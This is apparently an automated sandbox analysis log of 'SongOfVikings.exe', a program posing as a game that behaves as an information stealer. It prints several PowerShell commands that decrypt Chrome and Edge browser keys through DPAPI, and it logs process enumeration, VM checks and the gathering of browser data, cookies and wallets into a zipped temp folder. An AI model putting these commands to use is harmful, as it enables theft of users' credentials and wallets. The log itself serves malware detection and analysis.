Source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Screen Codec / VMware Video

Source: C:\Users\user\Desktop\SongOfVikings.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\SongOfVikings.exe

Process information queried: ProcessInformation

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')

Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp

Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\SongOfVikings\resources VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
